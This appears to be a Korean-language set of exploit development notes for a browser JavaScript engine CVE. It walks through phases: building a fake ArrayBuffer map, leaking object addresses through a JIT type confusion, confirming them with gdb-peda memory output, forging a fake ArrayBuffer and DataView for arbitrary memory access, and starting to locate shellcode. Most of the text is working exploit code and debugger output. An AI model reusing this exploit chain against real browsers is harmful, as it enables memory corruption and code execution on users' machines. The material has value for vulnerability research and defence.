CVE

ab_map_obj 생성

phase 1 : set ab_map_obj[]

ap.proto를 구해서 ab_map_obj에 넣는다

        //alert_log(addr);
        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]
        ab_proto_addr = read_obj_addr(ab.__proto__);
        ab_constructor_addr = ab_proto_addr - 0x70;
        alert_log("[.] 1.ab_prot_addr: 0x" + ab_proto_addr.toString(16));
        //sleep(60*1000);
        ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
        ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
        ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
        ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
0x26e976fd3f78:    0xdaba0000daba0000    0x000900c01f000008
0x26e976fd3f88:    0x00000000082003ff    0x000026e976f95889
0x26e976fd3f98:    0x000026e976f95819    0x0000000000000000

phase 2 : ab_map_obj 의 주소 찾기

gdb에서 0x000900c01f000008 값이 찾아져야 함
change_to_float(ab_map_obj,ab_map_obj_float);
ab_map_obj_addr = read_obj_addr2(ab_map_obj_float) + 0x40

gdb-peda$ find 0x000900c01f000008
Searching for '0x000900c01f000008' in: None ranges
Found 1 results, display max 1 items:
mapped : 0x26e976fd3f80 --> 0x900c01f000008

phase 3 : fake_ab 의 주소 찾기

change_to_float(fake_ab,fake_ab_float);
fake_ab_float_addr = read_obj_addr3(fake_ab_float) + 0x40;

        var fake_ab = [
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                0x0,0x4000, /* buffer length */
                0x12345678,0x123,/* buffer address */
                0x4,0x0
        ]

phase 4 : fake_arraybuffer 오프젝트 만들기

fake_arraybuffer = double_arr42[1];
fake_dv = new DataView(fake_arraybuffer,0,0x4000);

        fake_ab_float_addr_f = d2u(fake_ab_float_addr / 0x100000000,fake_ab_float_addr & 0xffffffff).toString();
        function carry_me_plz_fake(arr){
                for(var i = 0;i < arr.length;i++){
                        var o = arr[i];
                        ttt = o[0];
                }
        }
        eval('function sorry_fake(){1 + valueOf4;double_arr42[0] = 1.1;carry_me_plz_fake(array4);double_arr42[1] = '+fake_ab_float_addr_f+';}')
        for(var i = 0;i < 0x1000;i++){
                carry_me_plz_fake(array3);
        }
        for(var i = 0;i < 0x1000;i++){
                sorry_fake();
        }
        flag = 1;
        sorry_fake();
        //sleep(60)

        fake_arraybuffer = double_arr42[1];

phase 5 : shellcode 주소 찾기

        function read_obj_addr5(object){
                function carry_me_plz(arr,obj){
                        for(var i = 0;i < arr.length;i++){
                                var o = arr[i];
                                o[0] = obj;
                        }
                }
                function sorry(){
                        1 + valueOf5;
                        double_arr52[0] = 1.1;
                        carry_me_plz(array5,object);
                        return double_arr52[0];
                }
                for(var i = 0;i < 0x1000;i++){
                        carry_me_plz(array5,object);
                }
                for(var i = 0;i < 0x1000;i++){
                        sorry();
                }
                flag = 1;
                re = u2d(sorry());
                return re;
        }